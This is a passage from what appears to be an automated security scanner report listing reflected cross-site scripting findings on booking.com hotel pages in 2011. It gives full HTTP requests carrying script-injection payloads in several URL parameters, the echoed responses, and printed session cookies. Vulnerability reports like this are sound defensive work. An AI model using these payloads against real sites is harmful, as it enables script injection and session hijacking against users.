The value of the aid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb954"><script>alert(1)</script>ed55eb07e33 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804eb954"><script>alert(1)</script>ed55eb07e33&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:09 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4n0eINcsV9R8sbXV6xyE9Xpwy687hQ9%2Bv%2F8VZQ7vbSfGP0uBFv%2B8wJxNuH5bdT%2B6C7LQH2wVRzMP36cfIOOwHiWPVx%2FKRfjRo4x9vnWERtfNT0fRHj4b7ZsypXGyv%2FFM0es64%2BIyqBE3%2BQNEh2LRBVUKPgKNt5YTZ4PRV2UhZBt3mT7I6RTkvMF7pIdMJ%2B7d1de0fbsftD79U%2BA8NxJLnQensvNV8ju0hsr4TIiG%2F%2Frlj1JBoCtUGvl2CdFk9mYtkewKS28ABXYmTcqIEmP%2FoVYMDwDwGuLxLBjf13xLUjENgoiQ2DvZSunABFP35sQtA2u81lvG1nOKmQgDoi%2FP%2FiY9ga1of52M%2FommlG%2BMjlU48leMYaotYwYxorSw12Wgs63lrJXQFIEmk%2BWcSw7fqIFcJF0JAZyLI7wDrUoLQ7IF6rHUjqyVwR45P8ZBu7q9dQ9B8a7eSd%2FlOvfBBV6kmRcrD7OAg06YVsOBW%2BHu7JpPcyEO8jLX%2FzdSJ2DEgesjjnf5wglkntMgWbMO5JX9TJXfm3WgzlaKeLotbIX39YuxGFZzb91lU419UOvgqZkIBcCPT3YNG7rDqwhkSOz0DkJKvrJlXVsBDdHyWQgfHe8JrpRF%2F8P2CQOdDYqVYxbjfxtZTXhuxlG1xBj4%2FuXB9SiYgakxi7YPVutwrKMY8UGvRCjTqObdzCgdDsxoS1iYrHKROhbHr6G5hERhuYtJ%2FB8iiUCEqLYe%2Fh0TT%2BwtEFp%2FFyodD65ruCa0Wp%2Bo0Qj05HV5btKiy9nRfNdKgieB4UQ21D35Lw9rOUwVdr%2F39Je8St887MhdMsPJOTf9f%2F8JmMzbg6HRivu%2Fa1d7DLFQTrSf1vXLmHOwm5uFEBJcYmaeYwBvuRYsAZfvZBWy8CvvpblOB14QJEcGhhcbgPMA2bGs7JfnFEMAbo0LeCQYFhqRJJyy220xu5vXJz0ZiPzhcSvhB8H2fYGy5IeyLuefOzf4KrYm4w7HqYy%2BOp15STjkETfDKwaIs0kkuKvgpe%2FLIR9D4IfbF2M01y7WVrP9tc%2FHdHtSsV20wzNnuRJKlI8BCl%2B%2FO6kI84B96aJ6Pb%2FzG28RK%2FaqyYyBOomkJjx1oKkjqPWt5aiAI%2BKy5homauCo8I4%2Bf%2BdexcrIQZ2gmgEvRNDpdf9yZAn81Pcbs6s48anVFDfZxAv5REsnv4pxEooJuW6mH6KX2NlYJc%2BbnpXJoVc2e%2BV%2FnaH4B0STbxRb8uvVoE67yXJvvWaous%2FcSV00T%2Bhqdtl6hbtFPTSlwMutJClGw%2F%2BRGGITPwH9AZVlohF7kWbEcEDdvSOV1CsJYaIpkqBgCQ%2FRLUvycOTE9XdI2oqe0B0zoyQE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:11:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 228634
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<a target="_blank" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804eb954"><script>alert(1)</script>ed55eb07e33&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_
...[SNIP]...
4.170. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf942"><script>alert(1)</script>41df27e8007 was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14cf942"><script>alert(1)</script>41df27e8007&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:04 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGdtgREHFMYP9KL%2BXWDp4eXWLKqDT4JHK4Ck5t9jXCZSfgs8iZ0zc4fI%2FNmoyKuXU%2F74EgzaV72KBAwDEbn9K7SqcpEXhY0l1KJih5E2TOjss6weHL6zvPdgpsLLsf1oG%2BH7TzGNYU4bNvX1GP8SiLhTA%2FvdnRlJXj2q0%2FBKEyhlglZdav2FlTPKnBneyCmsuM36VOCkVAn5L2CkKQ1vOz1okhGPaUihOuFhSIzlj9Arejb62RiNeghkIEoeTA%2BgIdU4HfXEzFoQqkNfkE15VQpyDqYIaEjbaDqet4733cA3Z6Hq1c44TurbwalX%2BDTE4tp8U8NsDBuoTekaJj9Ek05Gb%2FrOAFOBOsT1niC1HH8F3Wcu4MiPLGvPW%2BXojhtsHuqxK6tJJEpM65v5%2FuBa3ahdAnP790KQdF%2FgY3Il%2B1bdrzgf4JiZf2hnnxm661d40W8AuxjF9%2BKprTgXAp%2B75A7JEY01wZYHFAldpGQ6d1dFpLCcx2tpjO2AazPLocxB%2BeW0PjQnekdA%2FPnRj%2FHNQs9d4w1NGpq7OCx9QAgYsm3eBU4WSkGUPKYJmcKeaj3eHs%2FVm%2BE8xb0um%2BlFRWOv8oyfA3bHI9vCkDY5cdU%2BTG1sjb802fhPCmSN8N55QS0fpgfp13E%2F%2FIYjh64GmXW%2FdcpPauCfyGFKnGT2cTV9exDpFLUDUcsR2sTp6MNzZz%2BDO13KFrgLHKvZbkDIXd8m4Nj51Yvwp1s3R15BXNpMqXuHhV60gbt1EKpTsGv%2B3tw%2BDwIMv6oz7U%2BvhS%2BM9FWIkhbMpKUu6VhApOl7hpKM5cO3%2BGkU2B%2FtRQaGLwTkrkgnxYkXAXjau8InPVw8U4XbGejs0fE7kJDcJ%2F%2F526LouDz9G7xSAJqQQHnny5kBfWRhjIhN%2BvO3uU40p3IHu4d2vX8N3lO9qqqYt3g%2FJPROXoBgwseiJjTIabvro5I%2BgYJ1OirpqRrGbn%2FKc09E7x3bEEFR75ch6a8eNDbgPIZ%2FGYSal6ZfasIUvhuKCsGZge1berGdarGyubRZq4oF7pccaqbrqbByUbeGqcu1IsLOGbYgSiatNwEI4I4XdCvmlGqdkDmPNqTZ3OarO66BHoDhCvj7gBNcMTYRl%2FzEoqxD4Kl%2BEAtJAfwpx38PCJSNZbPv2pK%2BHhtP88gaNoudUKmHf4c4NQC%2FUMsNw96mVJLkOIHM6KHh4%2BDntkQO%2BrxXCXvv2bK2X%2FFF6jO0b6ev92jRrBgaz8cTMsMsvCQrIHKjBb4v4thjhwYgUwLtbDrg0DBVC0DC7x4XBGO%2BpY0LF%2Fbv9TnmEalex01QJmuJL8gl35I1%2BQoRl%2Fc2p8kphQORHwWnvFneHS%2FhM3vAAtODPo%2BUb62w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:05 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 225016
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ww.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14cf942"><script>alert(1)</script>41df27e8007&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en">
...[SNIP]...
4.171. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40b0</script><script>alert(1)</script>9c893ecf6af was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14c40b0</script><script>alert(1)</script>9c893ecf6af&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:29 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oJBLkiYkI3H9Y5c95Zh2t9qvrttH6Yph3c9UFQxNxRLA50h%2F9l7Z1LM5ucjfbDVKd1IZeHA3Fz9nU5vhVSkxzPUsWV2f0Xw0%2F7WRmu3stlxPha67PyTw8gE3xKjs0KBsbl9BfJt3lyYoGC1z8ctq0WQbn63cebT19OOaxscf17XZ5WEWFdXX8VRXeTSkCtrpdm8VFcb3Omkrd8ROmQKKhx%2FIBoi8QqKzndMh7F3nM%2BvQSZwEbQ4yASNWIiW8u%2FzaDg2mjAWMVjVqqUujDRU5PSX1aljVXxzelRea3BNV0DXGn6IvpVR63ccHqfr7aZPr3BVPHHs7%2FZ%2FDJ5MqYby8VRcKeiijvXZJQ%2Bw9TVV5PK6f07oVP%2BF0N4b0x7RQhWWYPQzpEEL%2BSyq0G8cHau1JfARq56wUf6894HQXKOtdC81YJZbC9uSDe5U8aMjFp8Xr%2BYDsSsgtnv%2BTncBIzseqSO5iJX4JqhnrsuCj6UyH3dtQQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:30 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 225038
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ww.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14c40b0</script><script>alert(1)</script>9c893ecf6af&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b6077
...[SNIP]...
4.172. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed23e"><script>alert(1)</script>defc7b1fdf7 was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10ed23e"><script>alert(1)</script>defc7b1fdf7&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7